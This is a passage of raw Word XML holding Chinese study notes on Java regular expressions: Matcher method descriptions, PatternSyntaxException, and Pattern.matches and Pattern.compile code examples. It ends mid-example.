    <w:p w14:paraId="062A2BE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回最后匹配字符之后的偏移量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE20605" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public int end(int group)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DB8E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>返回在以前的匹配操作期间，由给定组所捕获子序列的最后字符之后的偏移量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657B032E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35DB65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找方法用来检查输入字符串并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>返回一个布尔值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表示是否找到该模式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E89CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4069950E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public boolean lookingAt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87FF2C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试将从区域开头开始的输入序列与该模式匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55550097" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public boolean find()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904973E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试查找与该模式匹配的输入序列的下一个子序列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002AFF11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public boolean find(int start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C87E4FA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置此匹配器，然后尝试查找匹配该模式、从指定索引开始的输入序列的下一个子序列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54680E55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public boolean matches()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FAADFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试将整个区域与模式匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F1624E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C55284C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换方法是替换输入字符串里文本的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F7BCE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3016ED32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public Matcher appendReplacement(StringBuffer sb, String replacement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9653A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现非终端添加和替换步骤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741337BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public StringBuffer appendTail(StringBuffer sb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DDEAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现终端添加和替换步骤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666428F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public String replaceAll(String replacement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B83E286" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换模式与给定替换字符串相匹配的输入序列的每个子序列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95E5E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public String replaceFirst(String replacement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1A3BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换模式与给定替换字符串匹配的输入序列的第一个子序列。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261354D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public static String quoteReplacement(String s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA99098" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回指定字符串的字面替换字符串。这个方法返回一个字符串，就像传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Matcher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">appendReplacement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一个字面字符串一样工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1CF9AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A32F40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23587614" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B6B037" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6292E460" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38503222" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A01478" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="533E42CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169541B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7705AB8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F92CC96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PatternSyntaxException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF6F49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PatternSyntaxException </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个非强制异常类，它表示一个正则表达式模式中的语法错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D005D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A3B626" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码实例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8F726C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pattern.matches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50256FED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743B701" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD08E63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class RegexExample1{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF32A74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB090B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      String content = "I am noob " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC7786" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        "from runoob.com.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28722E9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      String pattern = ".*runoob.*";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F731C32" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      boolean isMatch = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Pattern.matches(pattern, content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0D77DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符串中是否包含了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'runoob' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>? " + isMatch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC40FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215EC5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E19D6C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pattern.compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205130BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Matcher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C78F16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import java.util.regex.Pattern;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C92352" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465CE2F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class RegexMatches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747B35CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBFC26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main( String[] args ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D950F40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76F51A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>按指定模式在字符串查找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A59AD3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      String line = "This order was placed for QT3000! OK?";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3142DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      String pattern = "(\\D*)(\\d+)(.*)";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE99DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC15FA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pattern </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7F04CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Pattern r = Pattern.compile(pattern);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E7E75E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3D24C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>现在创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> matcher </w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C77C96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Matcher m = r.matcher(line);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38034B34" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.find( )</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168D305" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("Found value: " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.group(0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D744B72" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("Found value: " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.group(1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F2C28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("Found value: " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.group(2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CDC8E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println("Found value: " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m.group(3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA145F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19062532" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
